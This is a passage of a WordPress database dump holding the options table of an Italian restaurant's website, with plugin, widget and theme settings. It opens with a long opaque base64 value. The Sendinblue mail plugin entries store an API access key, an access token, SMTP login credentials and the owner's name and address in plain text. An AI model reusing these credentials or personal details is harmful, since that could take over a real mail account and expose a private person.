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','yes'),(173,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}','yes'),(188,'widget_sydney_contact_info','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(192,'sib_use_new_version','2.9.0','yes'),(193,'sib_subscription_option','a:2:{s:13:\"sib_form_html\";s:391:\"<p class=\"sib-email-area\">\r\n    <label class=\"sib-email-area\">Email Address</label>\r\n    <input type=\"email\" class=\"sib-email-area\" name=\"email\" required=\"required\">\r\n</p>\r\n<p class=\"sib-NAME-area\">\r\n    <label class=\"sib-NAME-area\">Name</label>\r\n    <input type=\"text\" class=\"sib-NAME-area\" name=\"NAME\" >\r\n</p>\r\n<p>\r\n    <input type=\"submit\" class=\"sib-default-btn\" value=\"Subscribe\">\r\n</p>\";s:20:\"available_attributes\";a:1:{i:0;s:4:\"NAME\";}}','yes'),(194,'sib_main_option','a:2:{s:10:\"access_key\";s:16:\"cjITv76r4xLROECd\";s:6:\"ma_key\";s:0:\"\";}','yes'),(195,'sib_home_option','a:6:{s:7:\"list_id\";s:1:\"2\";s:14:\"activate_email\";s:3:\"yes\";s:6:\"sender\";N;s:9:\"from_name\";N;s:10:\"from_email\";N;s:11:\"activate_ma\";s:2:\"no\";}','yes'),(196,'sib_token_store','a:1:{s:12:\"access_token\";s:32:\"22af6a201dacad86fc6f5bd01a06a0be\";}','yes'),(197,'sib_account_option','a:3:{s:13:\"account_email\";s:29:\"info@www.ristorantesolymar.it\";s:17:\"account_user_name\";s:12:\"Teo Pesaresi\";s:12:\"account_data\";a:3:{i:0;a:5:{s:9:\"plan_type\";s:10:\"CREDIT_REC\";s:7:\"credits\";i:33959;s:11:\"credit_type\";s:10:\"Send Limit\";s:10:\"start_date\";s:10:\"2015-07-02\";s:8:\"end_date\";s:10:\"2015-08-02\";}i:1;a:3:{s:9:\"plan_type\";s:3:\"SMS\";s:7:\"credits\";i:0;s:11:\"credit_type\";s:10:\"Send Limit\";}i:2;a:8:{s:10:\"first_name\";s:3:\"Teo\";s:9:\"last_name\";s:8:\"Pesaresi\";s:5:\"email\";s:29:\"info@www.ristorantesolymar.it\";s:7:\"company\";N;s:7:\"address\";s:30:\"Via Lungomare D’Annunzio 190\";s:4:\"city\";s:8:\"Riccione\";s:8:\"zip_code\";s:5:\"47838\";s:7:\"country\";s:5:\"Italy\";}}}','yes'),(198,'sib_smtp_details','a:4:{s:8:\"username\";s:29:\"dati@www.ristorantesolymar.it\";s:8:\"password\";s:16:\"cjITv76r4xLROECd\";s:5:\"relay\";s:20:\"smtp-relay.mailin.fr\";s:4:\"port\";s:3:\"587\";}','yes'),(199,'sib_use_apiv2','1','yes'),(200,'sib_signup_option','a:8:{s:16:\"is_confirm_email\";s:3:\"yes\";s:15:\"is_double_optin\";s:2:\"no\";s:12:\"redirect_url\";s:0:\"\";s:18:\"redirect_url_click\";s:0:\"\";s:11:\"template_id\";s:2:\"-1\";s:23:\"doubleoptin_template_id\";s:2:\"-1\";s:9:\"sender_id\";N;s:21:\"is_redirect_url_click\";s:2:\"no\";}','yes'),(201,'sib_confirm_option','a:4:{s:21:\"alert_success_message\";s:45:\"Thank you, you have successfully registered !\";s:19:\"alert_error_message\";s:23:\"Something wrong occured\";s:22:\"alert_exist_subscriber\";s:27:\"You have already registered\";s:19:\"alert_invalid_email\";s:29:\"Your email address is invalid\";}','yes'),(202,'widget_menu-type-a','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(203,'widget_menu-type-b','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(204,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(205,'widget_siteorigin-panels-builder','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(206,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(207,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(208,'widget_siteorigin-panels-post-content','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(209,'widget_siteorigin-panels-postloop','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(210,'widget_sydney_video_widget','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(211,'widget_sydney_action','a:3:{i:1;a:0:{}i:2;a:5:{s:5:\"title\";s:18:\"Pasqua & Pasquetta\";s:15:\"action_btn_link\";s:70:\"http://www.ristorantesolymar.it/2017/03/22/menu-pasqua-pasquetta-2017/\";s:15:\"action_btn_text\";s:14:\"Prenota Online\";s:6:\"inline\";b:1;s:11:\"action_text\";s:15:\"Scopri il menù\";}s:12:\"_multiwidget\";i:1;}','yes'),(212,'widget_sydney_clients','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(213,'widget_sydney_employees','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(214,'widget_sydney_facts','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(215,'widget_sydney_latest_news','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(216,'widget_list','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(217,'widget_sydney_services_type_a','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(218,'widget_sydney_services_type_b','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(219,'widget_sydney_skills','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(220,'widget_fp_social','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(221,'widget_sydney_testimonials','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(222,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(225,'sib_attribute_option','a:3:{i:0;a:2:{s:4:\"name\";s:4:\"NOME\";s:4:\"type\";s:4:\"text\";}i:1;a:2:{s:4:\"name\";s:7:\"COGNOME\";s:4:\"type\";s:4:\"text\";}i:2;a:2:{s:4:\"name\";s:3:\"SMS\";s:4:\"type\";s:4:\"text\";}}','yes'),(226,'widget_sib_subscribe_form','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(230,'theme_mods_impressive','a:5:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:2;}s:12:\"header_image\";s:13:\"remove-header\";s:16:\"background_image\";s:0:\"\";s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1461158775;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:3:{i:0;s:6:\"text-3\";i:1;s:20:\"sib_subscribe_form-2\";i:2;s:6:\"text-2\";}}}}','yes'),(231,'impressive_theme_options','a:36:{s:4:\"logo\";s:68:\"http://www.ristorantesolymar.it/wp-content/uploads/2015/07/logo2.png\";s:7:\"favicon\";s:0:\"\";s:9:\"blogtitle\";s:0:\"\";s:24:\"remove-header-socialicon\";s:3:\"yes\";s:12:\"headertop-bg\";s:111:\"http://www.ristorantesolymar.it/wp-content/uploads/2015/07/11059770_10154021915942738_6099049076285366168_n.jpg\";s:10:\"footertext\";s:93:\"Sol y Mar : telefono 0541-648528 | viale D\'Annunzio 190 | Riccione 47836 (Rn) | Spiaggia di c\";s:10:\"home-title\";s:0:\"\";s:14:\"home-sub-title\";s:0:\"\";s:8:\"homedesc\";s:0:\"\";s:14:\"section-icon-1\";s:0:\"\";s:14:\"sectiontitle-1\";s:0:\"\";s:13:\"sectiondesc-1\";s:0:\"\";s:14:\"section-icon-2\";s:0:\"\";s:14:\"sectiontitle-2\";s:0:\"\";s:13:\"sectiondesc-2\";s:0:\"\";s:14:\"section-icon-3\";s:0:\"\";s:14:\"sectiontitle-3\";s:0:\"\";s:13:\"sectiondesc-3\";s:0:\"\";s:23:\"get-in-touch-background\";s:0:\"\";s:17:\"home-button-title\";s:0:\"\";s:16:\"home-button-link\";s:0:\"\";s:7:\"homemsg\";s:0:\"\";s:15:\"home-blog-title\";s:0:\"\";s:19:\"home-blog-sub-title\";s:0:\"\";s:21:\"blog-post-number-home\";s:0:\"\";s:5:\"fburl\";s:49:\"https://www.facebook.com/www.ristorantesolymar.it\";s:7:\"twitter\";s:0:\"\";s:7:\"youtube\";s:0:\"\";s:3:\"rss\";s:0:\"\";s:18:\"contact-info-title\";s:0:\"\";s:12:\"contact-info\";s:0:\"\";s:17:\"contact-telephone\";s:11:\"0541 648528\";s:11:\"contact-fax\";s:0:\"\";s:13:\"contact-email\";s:29:\"info@www.ristorantesolymar.it\";s:11:\"contact-web\";s:0:\"\";s:15:\"contact-address\";s:41:\"Viale D’Annunzio, 190 47838 Riccione RN\";}','yes'),(449,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:25:\"webmaster@baldisserri.com\";s:7:\"version\";s:5:\"5.6.3\";s:9:\"timestamp\";i:1618540459;}','no'),(842,'revslider_checktables','1','yes'),(843,'revslider-static-css','.tp-caption a {\ncolor:#ff7302;\ntext-shadow:none;\n-webkit-transition:all 0.2s ease-out;\n-moz-transition:all 0.2s ease-out;\n-o-transition:all 0.2s ease-out;\n-ms-transition:all 0.2s ease-out;\n}\n\n.tp-caption a:hover {\ncolor:#ffa902;\n}','yes'),(844,'revslider-update-check-short','1618800813','yes'),(845,'revslider-valid-notice','false','yes'),(851,'lightbox_gallery_data','a:1:{s:15:\"global_settings\";a:7:{s:29:\"lightbox_gallery_loading_type\";s:8:\"colorbox\";s:27:\"lightbox_gallery_categories\";s:0:\"\";s:22:\"lightbox_gallery_pages\";s:0:\"\";s:24:\"lightbox_gallery_columns\";s:0:\"\";s:30:\"lightbox_gallery_thumbnailsize\";s:0:\"\";s:29:\"lightbox_gallery_lightboxsize\";s:4:\"full\";s:37:\"lightbox_gallery_script_loading_point\";s:6:\"header\";}}','yes'),(1003,'revslider-latest-version','6.4.8','yes'),(1004,'revslider-notices','a:1:{i:0;O:8:\"stdClass\":8:{s:7:\"version\";s:5:\"9.9.9\";s:4:\"text\";s:324:\"<div style=\"display: block; background-color: #1C0950; text-align: \ncenter;\"><a \nhref=\"https://www.sliderrevolution.com/survey/slider-revolution-feature-survey/\"\n target=\"_blank\"><img alt=\"wow\" src=\"//updates.themepunch-ext-a.tools/banners/SR_backend_wow.jpg\" width=\"960\" height=\"250\" style=\"margin-bottom: -5px;\"></a></div>\";s:4:\"code\";s:11:\"TPRSV647-01\";s:5:\"color\";s:5:\"green\";s:7:\"disable\";b:0;s:9:\"is_global\";b:0;s:4:\"type\";s:1:\"3\";s:10:\"additional\";a:0:{}}}','yes'),(1100,'wpcf_users_options','1','yes'),(1102,'finished_splitting_shared_terms','1','yes'),(1103,'db_upgraded','','yes'),(3512,'installer_repositories_with_theme','a:1:{i:0;s:7:\"toolset\";}','yes'),(3845,'site_icon','0','yes'),(3846,'medium_large_size_w','768','yes'),(3847,'medium_large_size_h','0','yes'),(3850,'widget_rev-slider-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(5304,'wpcf-custom-taxonomies','a:2:{s:8:\"category\";a:21:{s:6:\"labels\";a:21:{s:4:\"name\";s:10:\"Categories\";s:13:\"singular_name\";s:8:\"Category\";s:12:\"search_items\";s:17:\"Search Categories\";s:13:\"popular_items\";N;s:9:\"all_items\";s:14:\"All Categories\";s:11:\"parent_item\";s:15:\"Parent Category\";s:17:\"parent_item_colon\";s:16:\"Parent Category:\";s:9:\"edit_item\";s:13:\"Edit Category\";s:9:\"view_item\";s:13:\"View Category\";s:11:\"update_item\";s:15:\"Update Category\";s:12:\"add_new_item\";s:16:\"Add New Category\";s:13:\"new_item_name\";s:17:\"New Category Name\";s:26:\"separate_items_with_commas\";N;s:19:\"add_or_remove_items\";N;s:21:\"choose_from_most_used\";N;s:9:\"not_found\";s:20:\"No categories found.\";s:8:\"no_terms\";s:13:\"No categories\";s:21:\"items_list_navigation\";s:26:\"Categories list navigation\";s:10:\"items_list\";s:15:\"Categories list\";s:9:\"menu_name\";s:10:\"Categories\";s:14:\"name_admin_bar\";s:8:\"category\";}s:11:\"description\";s:0:\"\";s:6:\"public\";b:1;s:12:\"hierarchical\";b:1;s:7:\"show_ui\";b:1;s:12:\"show_in_menu\";b:1;s:17:\"show_in_nav_menus\";b:1;s:13:\"show_tagcloud\";b:1;s:18:\"show_in_quick_edit\";b:1;s:17:\"show_admin_column\";b:1;s:11:\"meta_box_cb\";s:24:\"post_categories_meta_box\";s:7:\"rewrite\";b:0;s:9:\"query_var\";b:0;s:21:\"update_count_callback\";s:0:\"\";s:8:\"_builtin\";b:1;s:3:\"cap\";a:4:{s:12:\"manage_terms\";s:17:\"manage_categories\";s:10:\"edit_terms\";s:17:\"manage_categories\";s:12:\"delete_terms\";s:17:\"manage_categories\";s:12:\"assign_terms\";s:10:\"edit_posts\";}s:4:\"name\";s:8:\"category\";s:11:\"object_type\";a:1:{i:0;s:4:\"post\";}s:5:\"label\";s:10:\"Categories\";s:4:\"slug\";s:8:\"category\";s:8:\"supports\";a:1:{s:4:\"post\";i:1;}}s:8:\"post_tag\";a:21:{s:6:\"labels\";a:21:{s:4:\"name\";s:4:\"Tags\";s:13:\"singular_name\";s:3:\"Tag\";s:12:\"search_items\";s:11:\"Search Tags\";s:13:\"popular_items\";s:12:\"Popular Tags\";s:9:\"all_items\";s:8:\"All Tags\";s:11:\"parent_item\";N;s:17:\"parent_item_colon\";N;s:9:\"edit_item\";s:8:\"Edit Tag\";s:9:\"view_item\";s:8:\"View Tag\";s:11:\"update_item\";s:10:\"Update Tag\";s:12:\"add_new_item\";s:11:\"Add New Tag\";s:13:\"new_item_name\";s:12:\"New Tag Name\";s:26:\"separate_items_with_commas\";s:25:\"Separate tags with commas\";s:19:\"add_or_remove_items\";s:18:\"Add or remove tags\";s:21:\"choose_from_most_used\";s:30:\"Choose from the most used tags\";s:9:\"not_found\";s:14:\"No tags found.\";s:8:\"no_terms\";s:7:\"No tags\";s:21:\"items_list_navigation\";s:20:\"Tags list navigation\";s:10:\"items_list\";s:9:\"Tags list\";s:9:\"menu_name\";s:4:\"Tags\";s:14:\"name_admin_bar\";s:8:\"post_tag\";}s:11:\"description\";s:0:\"\";s:6:\"public\";b:1;s:12:\"hierarchical\";b:0;s:7:\"show_ui\";b:1;s:12:\"show_in_menu\";b:1;s:17:\"show_in_nav_menus\";b:1;s:13:\"show_tagcloud\";b:1;s:18:\"show_in_quick_edit\";b:1;s:17:\"show_admin_column\";b:1;s:11:\"meta_box_cb\";s:18:\"post_tags_meta_box\";s:7:\"rewrite\";b:0;s:9:\"query_var\";b:0;s:21:\"update_count_callback\";s:0:\"\";s:8:\"_builtin\";b:1;s:3:\"cap\";a:4:{s:12:\"manage_terms\";s:17:\"manage_categories\";s:10:\"edit_terms\";s:17:\"manage_categories\";s:12:\"delete_terms\";s:17:\"manage_categories\";s:12:\"assign_terms\";s:10:\"edit_posts\";}s:4:\"name\";s:8:\"post_tag\";s:11:\"object_type\";a:1:{i:0;s:4:\"post\";}s:5:\"label\";s:4:\"Tags\";s:4:\"slug\";s:8:\"post_tag\";s:8:\"supports\";a:1:{s:4:\"post\";i:1;}}}','yes'),(5311,'su_installed','1457332425','yes'),(5312,'su_option_version','4.9.9','yes'),(5313,'widget_shortcodes-ultimate','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(5314,'su_option_custom-formatting','on','yes'),(5315,'su_option_skip','on','yes'),(5316,'su_option_prefix','su_','yes'),(5317,'su_option_hotkey','alt+i','yes'),(5318,'su_option_skin','default','yes'),(5319,'su_option_custom-css','','yes'),(5320,'sunrise_defaults_su','1','yes'),(5324,'_transient_su/examples/render/spoilers','<h2>Basic accordion</h2>\n<div class=\"su-accordion\">\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-plus su-spoiler-closed\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>Spoiler title</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-plus su-spoiler-closed\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>Spoiler title</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-default su-spoiler-icon-plus su-spoiler-closed\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>Spoiler title</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n</div>\n<div style=\"clear:both\"></div><div class=\"su-examples-code\"><span class=\"su-examples-get-code button\"><i class=\"fa fa-code\"></i>&nbsp;&nbsp;Get the code</span><textarea rows=\"8\">&lt;h2&gt;Basic accordion&lt;/h2&gt;\n\n[su_accordion]\n  [su_spoiler title=&quot;Spoiler title&quot;] Spoiler content [/su_spoiler]\n  [su_spoiler title=&quot;Spoiler title&quot;] Spoiler content [/su_spoiler]\n  [su_spoiler title=&quot;Spoiler title&quot;] Spoiler content [/su_spoiler]\n[/su_accordion]</textarea></div><h2>Fancy accordion</h2>\n<div class=\"su-accordion\">\n<div class=\"su-spoiler su-spoiler-style-fancy su-spoiler-icon-plus su-spoiler-closed\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>Spoiler title</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-fancy su-spoiler-icon-plus su-spoiler-closed\">\n<div class=\"su-spoiler-title\"><span class=\"su-spoiler-icon\"></span>Spoiler title</div>\n<div class=\"su-spoiler-content su-clearfix\" style=\"display:none\"> Spoiler content </div>\n</div>\n<div class=\"su-spoiler su-spoiler-style-fancy 